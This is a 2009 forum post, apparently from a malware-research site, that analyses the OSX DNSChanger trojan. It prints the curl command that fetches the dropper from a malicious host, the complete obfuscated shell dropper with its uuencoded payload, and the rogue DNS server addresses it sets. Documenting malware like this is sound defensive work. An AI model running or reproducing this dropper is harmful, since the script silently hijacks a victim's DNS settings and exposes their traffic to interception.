Author Topic: 91.212.65.20  (Read 10932 times)

0 Members and 1 Guest are viewing this topic.

May 08, 2009, 09:59:21 pm
Read 10932 times

MarcusB

  • Guest
(http://www.malwaredomainlist.com/forums/index.php?topic=2837.0)
The OSX version of DNSChanger will download a shell script...

curl -A 'i386;0;7000;my_hostname;' 91.212.65.20/cgi-bin/generator.pl
Quote
#!/bin/sh
tail -11 $0 | uudecode -o /dev/stdout | sed 's/TEERTS/'`echo ml.pll.oop.m | tr iopjklbnmv 0123456789`'/' | sed 's/CIGAM/'`echo ml.pll.oop.oo | tr iopjklbnmv 0123456789`'/'| sh && rm $0 && exit
begin 777 mac
M(R$O8FEN+W-H"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M26YS(@H*
M5E@Q/2)414525%,B"E98,CTB0TE'04TB"@I04TE$/20H("@O=7-R+W-B:6XO
M<V-U=&EL('P@9W)E<"!0<FEM87)Y4V5R=FEC92!\('-E9"`M92`G<R\N*E!R
M:6UA<GE397)V:6-E(#H@+R\G*3P\($5/1@IO<&5N"F=E="!3=&%T93HO3F5T
M=V]R:R]';&]B86PO25!V-`ID+G-H;W<*<75I=`I%3T8**0H*+W5S<B]S8FEN
M+W-C=71I;"`\/"!%3T8*;W!E;@ID+FEN:70*9"YA9&0@4V5R=F5R061D<F5S
M<V5S("H@)%98,2`D5E@R"G-E="!3=&%T93HO3F5T=V]R:R]397)V:6-E+R10
14TE$+T1.4PIQ=6ET"D5/1@H`
`
end

After running the script you will find two IPs that DNSChanger will use to change your DNS settings to.
VX1="85.255.112.8"
VX2="85.255.112.11"

May 10, 2009, 07:21:02 pm
Reply #1

MarcusB

  • Guest

May 12, 2009, 01:35:54 pm
Reply #2

MarcusB

  • Guest